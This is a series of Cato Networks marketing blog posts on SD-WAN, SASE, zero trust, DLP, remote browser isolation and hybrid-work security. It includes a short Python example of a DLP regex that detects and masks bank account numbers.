5 Best Practices for Implementing Secure and Effective SD-WAN
Corporate networks are rapidly becoming more complex and distributed. With the growth of cloud computing, remote work, mobile and Internet of Things (IoT), companies have users and IT assets everywhere, requiring connectivity.
Software-defined WAN (SD-WAN) provides the ability to implement a secure, high-performance corporate WAN on top of existing networks. However, SD-WAN infrastructures must be carefully designed and implemented to provide full value to the organization.
SD-WAN Best Practices
A poorly implemented SD-WAN poses significant risk to the organization. When designing and deploying SD-WAN, consider the following SD-WAN best practices.
Position SD-WAN Devices to Support Users
SD-WAN provides secure, optimized network routing between various locations. Often, organizations will deploy SD-WAN routers at their branch locations and near their cloud edge.
SD-WAN is also beneficial for remote workers. To ensure the solution provides the most optimal network connectivity, the SD-WAN solution must be deployed to maximize the performance of remote workers. This means minimizing the distance of remote traffic to the SD-WAN edge.
Use High-Quality Network Connectivity
SD-WAN is designed to improve network performance and reliability by intelligently routing traffic over different network connections, including broadband Internet, multi-protocol label switching (MPLS), and mobile networks. When traffic is sent to the SD-WAN device, it selects the most optimal path based on network conditions.
However, SD-WAN’s ability to enhance network performance and reliability is limited by the network connection at its disposal. If the available connection is inherently unreliable — like broadband Internet — then SD-WAN can do little to fix this problem. To maximize the value of an SD-WAN investment, it is essential to utilize a network connection that offers the desired level of performance, latency, and reliability.
Design for Scalability
Corporate bandwidth requirements are continuously increasing, and SD-WAN should be scalable to support current and future network requirements. Deploying SD-WAN using dedicated hardware limits the scalability of the solution and mandates upgrades or additional hardware in the future. Instead, companies should use an SD-WAN solution that takes advantage of cloud scalability to grow with the needs of the organization.
Integrate Security with Networking
SD-WAN is a networking solution, not a security solution. While it may securely and intelligently route traffic to its destination, it performs none of the advanced security inspection and policy enforcement needed to protect the organization and its employees against advanced cybersecurity threats.
For this reason, SD-WAN must be deployed together with network security. With the growth of remote work and the cloud, companies can’t rely on traffic flowing through the defenses at the network perimeter, and backhauling traffic defeats the purpose of deploying SD-WAN. A secure SD-WAN deployment is one that implements strong security with networking.
Consider an Integrated Solution
Often, a company’s approach to implementing vital networking and security solutions is to deploy point solutions that provide the desired capabilities. However, this commonly results in a sprawling IT architecture that is difficult and expensive to monitor, operate, and manage.
Taking this approach to implementing a secure SD-WAN deployment can exacerbate this problem. Since each SD-WAN device must be supported by a full security stack, the end result is deploying and operating several solutions at each location.
SASE (Secure Access Service Edge) provides a solution for this problem. SASE integrates SD-WAN capabilities with a full network security suite delivered as a cloud-based security service. With SD-WAN, an organization can implement and secure its WAN infrastructure with minimal cost and operational overhead.
Implementing Secure, Usable SD-WAN with Cato SASE Cloud
Organizations can achieve the full benefits of SD-WAN only by designing and deploying it correctly. Doing so will avoid poor network performance, reduced security, and negative user experiences.
Cato SASE Cloud provides SD-WAN functionality designed in accordance with SD-WAN best practices and offers the following benefits to organizations:
Global Reach: Cato SASE Cloud is a globally-distributed network of over 80 PoP locations. This allows remote workers to access the corporate WAN with minimal latency.
Optimized Networking: Cato SASE Cloud is connected through a network of dedicated Tier-1 carrier links. These connections provide greater network performance and resiliency than an SD-WAN solution running over the public Internet.
Converged Security: As a SASE solution, Cato SASE Cloud converges SD-WAN with a full network security stack. This convergence offers advanced threat protection without compromising network performance or user experience.
Cloud-Based Deployment: Cato SASE Cloud is deployed as a global network of PoPs connected by a global private backbone. As a result, it can offer greater scalability, availability, and resiliency than on-site, appliance-based solutions.
Managed SD-WAN: Cato SASE Cloud is available as a Managed SD-WAN service. This removes the responsibility for configuring, managing, and updating your SD-WAN deployment.
SD-WAN helps improve network performance, but it also introduces potential security risks. The Cato SASE Cloud solves this by converging SD-WAN and network security into a single software stack built upon a network of PoPs and connected by a global private backbone. Learn more about how implementing SD-WAN and SASE with Cato SASE Cloud can optimize your organization’s network performance and security.
Digital Transformation Is a Major Driver of Network Transformation
Many organizations are in the midst of rapid digital transformation. In the past few years, numerous new and promising technologies have emerged and matured, promising significant benefits. For example, many organizations are rapidly adopting cloud computing, and the growing maturity of Internet of Things (IoT) devices has the potential to unlock new operational efficiencies.
At the same time, many organizations are changing the way that they do business, expanding support for remote and hybrid work policies. This also has impacts on companies’ IT architectures as organizations adapt to offer secure remote access to support a growing work-from-anywhere (WFA) workforce.
New Solutions Have New Network Requirements
As digital transformation initiatives change how companies do business, corporate networks and IT architectures need to adapt to effectively and securely support the evolving business.
Digital Transformation is driving new network requirements including the following:
Remote Access: One of the biggest impacts of Digital Transformation is the growing need for secure remote access to corporate applications and systems. Remote workers need the ability to securely access corporate networks, and everyone requires secure connectivity to Cloud and Software as a Service (SaaS) solutions.
Network Scalability: The expansion of corporate IT architectures to incorporate new technologies drives a need for more network bandwidth. Networking and security technologies must scale to meet growing demand.
Platform Agnosticism: As companies deploy a wider range of endpoints and technology solutions, implementing and enforcing consistent, effective policies require a solution that works for any device and from anywhere.
Decentralized Security: Historically, companies have taken a perimeter-focused approach to network security. As digital transformation dissolves this perimeter, organizations need network security solutions that provide service everywhere their users are.
Developing a Network Transformation Strategy
A network transformation strategy should be designed to meet the new and evolving requirements driven by digital transformation.
Some of the key factors to consider when designing and implementing a network transformation strategy include:
Accessibility: Digital transformation initiatives commonly make corporate networks more distributed as remote users, cloud applications, and mobile devices connect to corporate resources from everywhere. A network designed to support the modern digital business must provide high-performance, secure access wherever users and applications are.
Scalability: As companies deploy new technologies, their bandwidth requirements continue to grow. Networking and security solutions must be designed and implemented to easily scale to keep pace with the evolving business needs.
Performance: Cloud applications are performance-sensitive, and inefficient networking will impact performance and user productivity. A network transformation project should ensure traffic is intelligently routed over the corporate WAN via high-performance, reliable network connectivity.
Security: As users and applications move off-premise, they dissolve the network perimeter where, traditionally, companies have focused their security protection. Network transformation projects should include decentralized network security to ensure inspection and policy enforcement occur closest to the user or application.
Reaching Network Transformation Goals with Cato SASE Cloud
Companies undertaking digital transformation initiatives should look for network and security technologies designed for the modern, distributed enterprise.
SASE (Secure Access Service Edge) solutions offer various features designed to support digital and network transformation, including:
Software-Defined WAN (SD-WAN): SD-WAN optimally routes network traffic over the corporate WAN. By monitoring link health and offering application-aware routing, SD-WAN optimizes the performance and reliability of the corporate WAN.
Cloud-Based Deployment: SASE solutions are deployed in the cloud. This removes geographic limitations and enables them to leverage cloud scalability and flexibility.
Integrated Security: SASE combines SD-WAN and network security into a single software stack. This enables traffic to be inspected, networking and security policies to be applied in a single pass, and the traffic then to be routed to its destination.
Consistent Policy Enforcement: SASE’s global cloud architecture ensures network and security policies are consistently enforced no matter where the users and applications are.
Cato SASE Cloud is a managed SASE platform that offers enterprise-grade security and optimized network routing over a global network of redundant Tier-1 carrier links. Learn more about how Cato SASE Cloud can help your organization meet its digital transformation goals.
ChatGPT and Cato: Get Fish, Not Tackles
ChatGPT is all the rage these days. Its ability to magically produce coherent and typically well-written, essay-length answers to (almost) any question is simply mind-blowing. Like any marketing department on the planet, we wanted to “latch onto the news.” How can we connect Cato and ChatGPT?
Our head of demand generation, Merav Keren, made an interesting comparison between ChatGPT and Google Search. In a nutshell, Google gives you the tools to craft your own answer, ChatGPT gives you the outcome you seek, which is the answer itself. ChatGPT provides the fish, Google Search provides the tackles.
How does this new paradigm translate into SASE, networking, and security? We have discussed at length the topic of outcomes vs tools. The emergence of ChatGPT is an opportunity to revisit this topic.
Historically, networking and network security solutions provided tools for engineers to design and build their own “solutions” to achieve a business outcome. In the pre-cloud era, the two alternatives on the table were Do-it-Yourself or pay someone else to Do-it-for-You. The tools approach was heavily dependent on budget, people, and skills to design, deploy, manage, and adjust the tools comprising the solution to make sure they continuously deliver the business outcome.
Early attempts to build a “self-driving” infrastructure to sustain desired outcomes didn’t take off. For example, intent-based networking was created to enable engineers to state a desired business outcome and let the “network” implement low-level policies to achieve it. Other attempts like SD-WAN fared better because the scope of desired outcomes was more limited and the infrastructure more uniform and coherent.
Thinking about IT infrastructure as enabling business outcomes became even more elusive as complexity grew with the emergence of digital transformation. Cloud migration and hybrid cloud, SaaS usage proliferation, growing use of remote access, and the expansion of attack surface to IoT have strained the traditional approach of IT solution engineering of applying new tools to address new requirements.
In this age of skills and resource scarcity, IT needs to acquire “outcomes” not mere “tools.”
There is an important distinction here between legacy and modern outcome delivery. Legacy outcome delivery is typically associated with service providers. They use tools to engineer a solution for customers, and then use manpower to maintain and adapt the solution to deliver an agreed upon outcome. To ensure they meet the committed outcomes, customers demand and get SLAs backed by penalties. This business structure silently acknowledges the fact that a service provider is fundamentally using the “same” headcount to achieve an outcome without any fundamental advantage over the customer’s IT. Penalties serve to motivate the service provider to deploy sufficient resources to deliver what the customer is paying for.
Modern outcome delivery is built on cloud native service platforms. It is built with a software platform that can adapt to changes and emerging requirements with minimal human touch. Most engineering goes into enhancing platform capabilities not managing it to specific customer needs.
This is where Cato Networks shines. Once a customer onboards into Cato, our platform is designed to continuously deliver “a secure and optimal access for everyone and everywhere” outcome without the customer having to do anything to sustain that outcome. The Cato SASE Cloud combines extreme automation, artificial intelligence, and machine learning to adapt to infrastructure disruptions, geographical expansion, capacity changes, user-base mobility, and emerging threats. While highly skilled engineers enhance the platform capabilities to seamlessly detect and respond to these changes, they do not get involved in the platform decision making process that is largely self-driving. Simply put, much of the customer experience lifecycle with Cato is fully and truly automated and embodies massive investment in outcome-driven infrastructure that is fully owned by Cato.
What this means is that any customer that onboards into Cato immediately experiences the networking and security outcomes typical of a Fortune 100 enterprise, in the same way an average content writer could deliver better and faster outcomes when assisted by the outcome driven ChatGPT.
If you want a fresh supply of fish coming your way as “Cato Outcomes”, take us for a test drive. Tackles are included, yet optional.
Why Network Visibility is Essential for Your Organization
Most modern companies are highly reliant on their IT infrastructure for day-to-day business, with employees relying on numerous on-prem and cloud-based software solutions for their daily activities.
However, for many companies, the network can be something of a black box. As long as data gets from point A to point B and applications continue to function, everything is assumed to be okay. However, the network can be a rich source of data about the state of the business. By monitoring network traffic flows, organizations can extract intelligence regarding their IT architectural design and security that can enhance IT efforts and inform business-level decision making and strategic investment.
What Type of Data Can Network Monitoring Provide?
Companies commonly achieve visibility into data flowing through the network via in-line monitoring solutions or network taps.
With access to the network data, an organization can perform analysis at different levels of granularity. One option is to analyze network data at a high-level to extract the source, destination, and protocols to baseline the network behavior patterns.
Alternatively, an organization can dig deeper into the network packet payload to determine if it contains malware or other malicious content that places the organization at risk.
Use Cases for Network Visibility
Comprehensive network visibility provides significant benefits to network and security teams alike, and both can take advantage of this to improve network analysis, performance, and security.
Advanced Threat Detection
Advanced threat detection solutions, such as a next-generation firewall (NGFW) or intrusion prevention system (IPS), commonly rely upon network traffic analysis. They inspect traffic flows for indicators of compromise (IoCs) such as malware or known malicious domains. Based on its analysis, the NGFW or IPS can generate an alert for security personnel or take action itself to block the malicious traffic flow from reaching its intended destination.
Zero Trust Security
Zero Trust is based on the principle of least privilege. Devices, applications, and users are granted access to corporate resources based on a variety of criteria including identity, device posture, geo-location, time-of-day, etc., and are constantly validated for fitness to remain on the network. Comprehensive network visibility is essential for implementing tighter security, including Zero Trust, and without it, organizations remain at extreme risk.
Companies commonly implement traffic filtering to prevent employees from visiting dangerous or inappropriate websites and to block malicious traffic flow. These traffic filters rely on the ability to inspect the packet contents and block it appropriately.
However, this protection is commonly limited to the network perimeter where organizations typically inspect and filter traffic. With full network visibility, an organization is able to protect all of its office and remote employees.
Data Loss Prevention
Data loss prevention (DLP) is a vital component of a corporate data security program since it can help identify and block the exfiltration of sensitive business data. DLP solutions work by inspecting network traffic for specific information like file types and data types associated with sensitive data, or potential compliance violations, and then applying policies to prevent data leakage. This is only achievable with enhanced network visibility.
Connected Device Visibility
Many companies lack full visibility into the devices connected to their networks. This lack of visibility can introduce significant security risks as unknown or unmanaged devices may have unpatched vulnerabilities and security misconfigurations that place them and the corporate network at risk. Network traffic analysis can help companies to gain visibility into these connected devices. By monitoring network traffic, an organization can map the devices, and identify unknown and unmanaged devices.
Anomalous Traffic Detection
Network monitoring allows organizations to identify common traffic patterns and potential traffic anomalies. These anomalies could point to issues with corporate systems or a potential cyberattack. Unusual traffic flow could be an indication of lateral movement by an attacker, communication to a command and control server, or attempted data exfiltration.
Network Usage Monitoring and Mapping
Understanding common network traffic patterns can also help inform an organization’s strategic planning. For example, understanding an application’s traffic and usage patterns could highlight unknown bandwidth requirements and help the organization’s cloud migration strategy to ensure maximum performance with minimal latency.
Enhancing Network Visibility with Cato SASE Cloud
To achieve network visibility, companies need strategically deployed solutions that can monitor and collect data on all traffic flowing over the corporate network. As remote work and cloud adoption make networks more distributed, this becomes more difficult to achieve.
SASE (Secure Access Service Edge) provides a means for companies to achieve network visibility across the corporate WAN. The Cato SASE Cloud converges SD-WAN and security capabilities, allowing all WAN traffic to flow across a global private backbone. This in-depth visibility allows all network and security traffic to be inspected, and all policies applied at the ingress PoP closest to the user or application. This ensures that policy enforcement is consistent across the corporate network.
The Cato SASE Cloud is a managed SASE solution that provides comprehensive network visibility and security for a high-performance, global WAN. Learn more about how Cato SASE Cloud can help improve your organization’s network visibility, security, and performance.
Achieving Zero Trust Maturity with Cato SSE 360
Trust is a serious issue facing enterprise architectures today. Legacy architectures are designed on implicit trust, which makes them vulnerable to modern-day attacks. A Zero Trust approach to security can remedy this risk, but transitioning isn’t always easy or inexpensive. CISA, the US government’s Cybersecurity and Infrastructure Security Agency, suggests a five-pillar model to help guide organizations to zero trust maturity.
In this blog post, we discuss how Cato SSE 360 helps facilitate Zero Trust Maturity based on CISA’s model. To read a more in-depth and detailed review, read the white paper this blog post is based on, here.
What is Zero Trust?
Today’s Work-From-Anywhere (WFA) environment requires a paradigm shift away from the traditional perimeter-centric security model, which is based on implicit trust. But in modern architectures, there are no traditional perimeters and the threats are everywhere.
A Zero Trust Architecture replaces implicit trust with a per-session-based (explicit trust) model. This ensures adherence to key Zero Trust principles: secure communications from anywhere, dynamic policy access to resources, continuous monitoring and validation, segmentation, least privilege access and contextual automation.
CISA Zero Trust Maturity and Cato SSE 360
Zero trust is a journey and the path to zero trust maturity is an incremental one. CISA’s Zero Trust Maturity Model helps enterprises measure this journey based on five pillars: Identity, Devices, Networks, Applications and Data.
Let’s examine the Cato SSE 360 approach to these.
Pillar 1 - Identity
The core of Zero Trust is ensuring user credentials are correctly and continuously verified, before granting access to resources. Cato SSE 360 leverages IdPs to enforce strict user identity criteria. Using TLS, identity and context are imported over LDAP or provisioned automatically via SCIM, and authorized users are continuously re-evaluated.
Pillar 2 - Devices
With zero trust, device risk is managed through Compliance Monitoring and Data Access Management. Validation includes all managed devices, IoT, mobile, servers, BYOD and other network devices. Cato SSE 360 combines Client Connectivity and Device Posture capabilities with 360-degree threat protection techniques to protect users, devices and resources. Cato has in-depth contextual awareness of users and devices for determining client connectivity criteria and device suitability for network access.
Pillar 3 - Network/Environment
To achieve the zero trust principles of Network Segmentation, Threat Protection and Encryption, a new, dynamic architecture is required. Cato SSE 360 provides such a dynamic security architecture and the network infrastructure to achieve these principles. Cato delivers 360-degree security with FWaaS, IPS, SWG, CASB, DLP and NextGen Anti-Malware, while enforcing Zero Trust policies at the cloud edge. In addition, Cato SSE 360 enables micro-segmentation, provides modern encryption, and uses AI and Machine Learning to extend threat protection.
Pillar 4 - Application Workloads
Wherever enterprise and cloud applications reside, the CISA Maturity Model dictates they receive Access Authorization, Threat Protection, and Accessibility. Cato SSE 360 ensures consistent access policy enforcement, regardless of the application location, user and device identity, or access method. Cato also provides threat hunting capabilities to extend security by identifying hidden threats to critical applications.
Pillar 5 - Data
To protect data, access needs to be provided on the least privileged basis and data needs to be encrypted. Cato SSE 360 inspects and evaluates users and devices for risk. In addition, advanced threat protection for data is enabled with tools like CASB, IPS, NextGen Anti-malware, FWaaS and DLP.
Cato SSE 360 neatly wraps around the CISA model, delivering visibility, analytics and automation across all pillars to facilitate dynamic policy changes and enforcement, and enriched contextual data for accelerated threat response.
Zero Trust Maturity with Cato
Cato SSE 360 facilitates zero trust with a cloud-native architecture that places user and device identity with global consistency at the center of its protection model. Cato SSE 360 controls and protects access to sites, mobile users, devices and enterprise and cloud resources, in compliance with Zero Trust principles. As a result, Cato’s approach to Zero Trust makes achieving Zero Trust Maturity easier for the modern enterprise.
To learn more, read the white paper.
Updated Cato DLP Engine Brings Customization, Sensitivity Labels, and More
Last year, we launched Cato DLP to great success. It was the first DLP engine that could protect data across all enterprise applications without the need for complex, cumbersome DLP rules. Since then, we have been improving the DLP engine and adding key capabilities, including user-defined data types for increased control and integration with Microsoft Information Protection (MIP) to immediately apply sensitivity labels to your DLP policy. Let's take a closer look.
User Defined Data Types
Cato provides over 300 pre-defined out-of-the-box data types and categories for typical scenarios of DLP policies. However, sometimes organizations require the ability to create custom-defined data types to match specific data inspections that are not covered by the pre-defined types.
To customize content inspection for your DLP policies, you can now define keywords, dictionaries, and regular expressions. Regular expressions allow for more accurate detection and prevention of data loss incidents, without impacting legitimate business operations. For example, you can use regular expressions to detect specific data patterns, such as email addresses with a string containing the keywords "Bank Account Number" and an 8-to-17-digit number.
Cato DLP configuration screen showing customized data types to meet individual requirements.
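The kind of regular-expression data type described above, a "Bank Account Number" keyword followed by an 8-to-17-digit number, can be prototyped and tested offline before it goes into any DLP policy. The following is an added example in plain Python, not Cato's code or configuration syntax; the function names, the 40-character keyword window and the sample messages are assumptions made for illustration.

```python
import re

# Keyword, then at most 40 characters on the same line, then a standalone
# run of 8 to 17 digits. The lookarounds reject a slice of a longer number,
# so a 19-digit string is not reported as a 17-digit account number.
ACCOUNT_PATTERN = re.compile(
    r"bank\s+account\s+(?:number\b|no\b\.?)"   # keyword variants
    r"[^\n]{0,40}?"                            # short same-line gap (assumed window)
    r"(?<!\d)(\d{8,17})(?!\d)",                # the 8-to-17-digit value
    re.IGNORECASE,
)


def mask(digits: str) -> str:
    """Keep only the last four digits so the DLP log does not leak the value."""
    return "*" * (len(digits) - 4) + digits[-4:]


def find_account_numbers(text: str) -> list[dict]:
    """Return one finding per keyword+number hit, with the value masked."""
    findings = []
    for match in ACCOUNT_PATTERN.finditer(text):
        findings.append(
            {
                "offset": match.start(1),      # where the digits begin
                "length": len(match.group(1)),
                "masked": mask(match.group(1)),
            }
        )
    return findings


# Constructed sample messages (not real data).
SAMPLES = [
    "Please wire funds to Bank Account Number: 12345678901 today.",  # hit
    "Order 12345678901 has shipped.",                 # digits, no keyword
    "bank account number 1234567",                    # only 7 digits
    "Bank Account Number: 1234567890123456789",       # 19 digits, too long
    "Our bank account notes 12345678 were archived.", # keyword look-alike
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r} -> {find_account_numbers(sample)}")
```

Only the first sample is reported; the other four are the near-misses a rule like this should be checked against so that it does not block legitimate traffic.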
MIP Sensitivity Labels
In addition, we recently added the support for MIP as another user defined data type. MIP offers sensitivity labels that enable organizations to classify their data based on their sensitivity level. The MIP classification system allows for greater control over how data is accessed, shared, and used within the organization.
By using sensitivity labels, organizations can ensure that sensitive data is only accessed by authorized personnel, while still enabling productivity and collaboration. After integrating Sensitivity Labels and adding them to a Content Profile, the DLP engine immediately enforces them for relevant traffic. For better policy granularity, create separate DLP rules to manage content access for different users and groups based on MIP labels.
For instance, a law firm that classified all their documents with MIP labels, can easily reuse the label in the Cato DLP policy to only allow senior partners to access certain documents.
MIP Sensitivity Labels are now supported in Cato DLP
Cato: Advanced Protection Everywhere – In an Instant
With the changes, Cato DLP brings advanced content inspection capabilities that combine data inspection with contextual information based on the full range of Cato’s Networking and Security engines. This unique approach provides greater accuracy and reduces false positives, resulting in a more efficient and effective DLP solution.
But, of course, the real distinction of Cato DLP is that it’s part of the Cato SASE Cloud platform. As a global cloud-native platform, Cato SASE Cloud brings DLP along with FWaaS, SWG, ZTNA, CASB, RBI, and more to remote users and locations everywhere in just a few clicks. Click to learn more about Cato SASE Cloud and about SASE.
Q&A Chat with Eyal Webber-Zvik on Cato RBI
Today Cato Networks announced the addition of the Cato RBI to our Cato SASE Cloud platform. It is an exciting day for us and for our customers. Why? Because Cato’s cloud-native security stack just got better, and without any added complexity.
I sat down with Eyal Webber-Zvik, Vice President of Product Marketing and Strategic Alliances at Cato Networks, and asked him to provide his perspective on what Cato RBI is and what this means for Cato’s customers.
Why should enterprises care about RBI?
Enterprises need to care because with new websites popping up every day, they face a dilemma between the security risk of allowing employees to access uncategorized sites and the productivity and frustration impact of preventing this. With Cato RBI now integrated into our Cato SASE Cloud platform, we are giving enterprise IT teams the best of both worlds: productivity and security.
What is Cato RBI and why do enterprises need it?
Cato RBI is a security function that protects against malicious websites by running browser activity remotely from the user’s device, separating it from the web content. Cato RBI sends a safe version of the page to the device so that malicious code cannot reach it, without affecting the user experience.
Enterprises need Cato RBI to protect employees from malicious websites that are not yet blacklisted as such. When employees do reach unknown and malicious sites, Cato RBI protects the business by preventing code from running in their browsers. Cato RBI protects from human error while also saving users from the frustration of being blocked from unknown websites.
How does Cato RBI work?
An isolated browser session is set up, remote from the user’s device, which connects to the website and loads the content. Safe-rendered content is then streamed to the users’ browsers. Malicious code does not run on the user’s device and user interaction can be limited, for example, to prevent downloads.
Some solutions require that every browsing session uses RBI, but it is better invoked when necessary, for example by a policy that is triggered when a user tries to visit an uncategorized website.
Cato RBI gives IT administrators a new option for uncategorized websites. Alongside “Block” and “Prompt,” they can now choose “Isolate.” Configuration of Cato RBI can be done in less than one minute by a customer’s IT administrator.
What if an enterprise already uses SWG, CASB, Firewall, IPS and/or anti-malware? Why do they need Cato RBI?
These solutions protect against a wide range of threats, but Cato RBI adds another important layer of protection specifically against web- and browser-based threats, such as phishing, cookie stealing, and drive-by downloads. Since Cato RBI prevents code from reaching devices, it will help protect a business against:
New attacks that are not documented.
New malicious sites that are not categorized.
User error, such as clicking on the link in a phishing email.
Cato RBI gives enterprises more peace of mind. It may allow organizations to operate a more relaxed policy on access to unknown websites, which is less intrusive and frustrating for users, who in turn will raise fewer tickets with their IT team.
What types of cyber threats does Cato RBI protect against?
Cato RBI provides protection against a wide range of browser-based attacks such as unintended downloads of malware and ransomware, malicious ads, cross-site scripting or XSS, browser vulnerabilities, malicious and exploited plug-ins, and phishing attacks.
What are the benefits of Cato RBI for enterprises and users?
There are five immediate benefits when using Cato RBI. They are:
To make web access safer by isolating malicious content from user devices.
To prevent your data from being stolen by making it more difficult for attackers to compromise user devices.
To protect against phishing email, ransomware, and malware attacks, by neutralizing the content in the target websites.
To defend against zero-day threats by isolating users from malicious websites that are new and not yet categorized.
To make users more productive by allowing them to visit websites even though they are not yet known to be safe.
Does Cato collaborate with other companies to offer Cato RBI?
Yes. We partner with Authentic8, a world leader in the field of RBI. Authentic8 is chosen by hundreds of government agencies and commercial enterprises and offers products that meet the needs of the most regulated organizations in the world. Authentic8’s RBI engine is cloud-native and globally available, and the integration into our Cato SASE Cloud is seamless and completely transparent.
Follow the links to learn more about Cato RBI, and about our SASE solution.
The Enterprise Network Cookbook
An enterprise network strategy helps organizations maximize connectivity between end-user devices and applications so they can achieve positive business outcomes. But not all organizations know how to build a comprehensive enterprise network strategy on their own.
A new report by Gartner guides Infrastructure & Operations (I&O) leaders in creating a dynamic enterprise network strategy that connects business strategy to implementation and migration plans. In this blog post, we bring attention to the main highlights of their recommendations. You can read the entire “Enterprise Network Cookbook,” complimentary from Cato, here.
Executive Summary - Communicates the summary to senior management. It should include the different stakeholder roles and the expected business outcomes. It is recommended to write this last.
Business Baseline - A summary of the top-level business strategy, the desired business outcomes and business transformation initiatives. The baseline should also cover potential benefits and risks and explain how to overcome challenges.
Campus and Branch Baselines - The organization’s guiding principles for campuses and branches. For example, wireless first, IoT segmentation, or network automation.
WAN Edge Baselines - Principles for the WAN edge, like redundant connectivity design or optimization of WAN for cloud applications.
Data Center and Cloud Networking Baselines - Cloud and data center principles. It is recommended to properly emphasize the importance of the data center and ensure automation by default.
Gartner’s Cookbook includes two sections of brainstorming and discussions when determining the main principles that will drive the enterprise networking strategy:
Services Strategy Brainstorming - The strategy that determines how security and management applications are consumed, both on-premises and from the cloud. This section should cover a variety of use cases, including infrastructure as a service, platform as a service and SaaS, a hybrid IT operating model, which applications remain on-premises, etc.
Financial Considerations - The financial implications of the enterprise network on corporate financial models. This section includes considerations like cost transparency, visibility, budgeting, asset depreciation predictability and funding sources.
Gartner also details what they consider the most important section of the enterprise network strategy:
Inventory - In this section, list the inventory of the equipment and how it is deployed for the purpose of discovering each item and ensuring it is part of the enterprise network. Make sure to detail the component’s location, vendor, cost, use case requirements, integrations, etc. If you have too many components, focus on the core network.
The enterprise network strategy needs to align with existing strategies so it doesn’t reinvent or contradict them. It should align with:
Security - Including security principles, responsibilities, and compliance
Organizational and Staffing Issues - Enterprise networking will change staffing and HR requirements, since the new strategy will require different skill sets.
Migration Strategy - A strategy for replacing legacy technologies. The strategy should take into consideration functionality, contract and service level agreements. Both technical and business factors should be present in the migration strategy.
Now that you’ve answered the “what” and “why” questions, you can move on to the implementation plan, i.e., the “how” and the “when”. But even if you’ve already started implementation, developing a network strategy document can help you continue to implement in a more effective way that addresses your organizational needs. Therefore, it is recommended to create a network strategy plan, no matter how far into the implementation you are.
Read more details from Gartner here.
Ensuring Secure, Scalable, and Sustainable Remote Access for the Hybrid Workforce
Remote or hybrid work has become the de facto standard for many companies, post-pandemic, as more employees demand more flexible workplace policies. Therefore, organizations looking to support hybrid work will require a long-term strategy that ensures their infrastructure is equipped to securely facilitate this new flexible work environment.
Remote Work Creates New Security Needs
The corporate workforce has, historically, been tethered to office configurations that made it easier to provide secure access to corporate applications. Traditional perimeter-based network security solutions would inspect and filter traffic before it passed through the network boundary. However, this has become much more complex because the age of the hybrid workforce dictates that we rethink this approach to ensure we provide the strongest possible protection against cyber threats for remote and office workers.
While security threats present the modern enterprise with numerous challenges, the more specific challenges associated with remote work include the following:
Secure Remote Access: Remote workers accessing corporate networks and applications over untrusted, public networks place themselves and the company at greater risk of cyber threats. These employees require reliable, secure remote access to ensure network connectivity to a remote site. Additionally, this secure connectivity, along with advanced threat defense, ensures protection for all users, applications and services against potential cyber threats.
Cloud Security: A significant amount of remote worker traffic goes to cloud-based business applications. Backhauling this traffic through corporate networks for inspection and policy enforcement is inefficient and impacts network performance and user experience.
Secure Internet Access: Direct Internet access is a common expectation for remote workers. However, this deprives employees of enterprise security protections, and backhauling through the corporate data center adversely impacts network performance and user experience.
Advanced Threat Protection: Companies commonly have next-generation firewalls (NGFWs) and other advanced threat protection solutions deployed at the network perimeter. Without these protections, remote employees are more at risk of cyber threats.
Key Requirements for Remote Work Security
The rise of remote work and the cloud has rendered traditional, perimeter-focused security solutions obsolete. If a significant percentage of an organization’s users and IT assets sit outside of the protected network, then defending that perimeter provides the organization with limited protection against cyber threats.
As hybrid work becomes the de facto standard for business, organizations will require a purpose-built infrastructure designed to offer high-performance secure remote access and advanced threat protection.
Key solution requirements will include:
Geographic Reach: Hybrid workers require secure and consistent anytime, anywhere access, so remote access solutions must ensure that a company can protect its remote employees while providing consistent security and performance no matter where they are.
Direct Routing: Backhauling remote traffic to the corporate data center for inspection adds latency and dramatically impacts network performance and the user experience. Security policies for remote workers must be easily applied and enforced while maintaining a great user experience.
Consistent Security: Consistent security and policy enforcement across the entire enterprise, including the remote workforce, is a must.
Resiliency: Remote work is commonly a component of an organization’s business continuity plan, enabling business to continue if normal operations are disrupted. A security solution for remote workers should maintain operations despite any network interruptions.
SASE and SSE Provide Secure Network Connections to Remote Sites
Secure Access Service Edge (SASE) is a cloud-based solution that converges network and network security, and enables companies to implement strong, consistent security for their entire workforce. This combination ensures that corporate network traffic undergoes security inspection en route to its destination with minimal performance impact. Additionally, a cloud-based deployment enhances the availability, scalability, and resiliency of an organization’s security architecture while delivering consistent policy enforcement.
Securing the Remote Workforce with Cato SASE Cloud
The Cato SASE Cloud is the convergence of networking and security into a single software stack and is built upon a global private backbone that provides network performance and availability guaranteed by a 99.999% SLA. With the Cato SASE Cloud, remote workers gain secure access to corporate applications and services along with advanced threat protection. Additionally, Cato’s global network of SASE PoPs ensures that companies have security policy enforcement without compromising on network performance.
The evolution of the hybrid workforce is dictating that organizations rethink their remote access strategies. Learn more about how Cato SASE Cloud can help your organization adapt to its evolving networking and security requirements.
A sit down with Windstream Enterprise CTO on Security Service Edge
Windstream Enterprise recently announced the arrival of North America's first and only comprehensive managed Security Service Edge (SSE) solution, powered by Cato Networks—offering sophisticated and cloud-native security capabilities that can be rapidly implemented on almost any network for near-immediate ironclad protection. In the spirit of partnership, we sat down with Art Nichols, CTO of Windstream, to share insights into this SSE announcement and what this partnership brings to light.
Why did you decide to roll out SSE?
We are excited to expand upon our single-vendor security offerings with the launch of this single-vendor cloud-native SSE solution, powered by Cato Networks. This SSE architecture delivers near immediate and cost-effective ways for clients to protect their network, and the users and resources attached to it. It also supports the expanded remote access to cloud-based applications that customers and employees alike must utilize.
By rolling out SSE to our customers, our ultimate goal is to provide them with a seamless journey towards improving their organization's security posture. Most IT leaders are aware that in this era of constant digital change, businesses must make room for greater cloud migration, rising remote work demands and new security threats. SSE will help futureproof their network security by migrating away from outdated and disjointed security solutions that are limited in their ability to support customer and employee needs for greater use of cloud resources.
Why did you choose Cato's SSE platform?
Partnering with Cato Networks was no doubt the right decision for Windstream Enterprise. While we considered multiple technology partners, Cato's solution was the only fully unified cloud-native solution. This architecture enables businesses to eliminate point solutions and on-premises devices by integrating the best available security components into their existing network environments without disruption. This partnership allowed us to enter the Secure Access Service Edge (SASE) and SSE market fast and be a key part of it as security needs continue to rapidly evolve.
Cato Networks is different from the competition because it was built to be a cloud-native SASE solution. As such, Cato's technology offers a better customer experience with greater visibility across the platform, as well as artificial intelligence that can swiftly evaluate all security layers and provide a faster resolution to security breaches and vulnerabilities.
